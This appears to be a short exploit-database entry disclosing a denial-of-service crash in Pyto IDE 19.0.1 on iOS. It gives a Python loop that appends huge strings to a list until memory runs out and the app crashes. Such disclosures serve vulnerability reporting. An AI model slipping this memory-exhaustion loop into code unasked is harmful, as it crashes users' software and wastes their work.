# Exploit Title: Pyto IDE 19.0.1 IOS ( DOS ) # Date: 02/14/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://pyto.app/ # Software Link: https://apps.apple.com/it/app/pyto-ide/id1436650069?l=en-GB # Version: 19.0.1 # Tested on: IOS 18.3.1 1. Create a new file any name.py 2. Put the following code: array = [] while True: array.append("A" * 10000000) 3. Once you run the code the app will crash.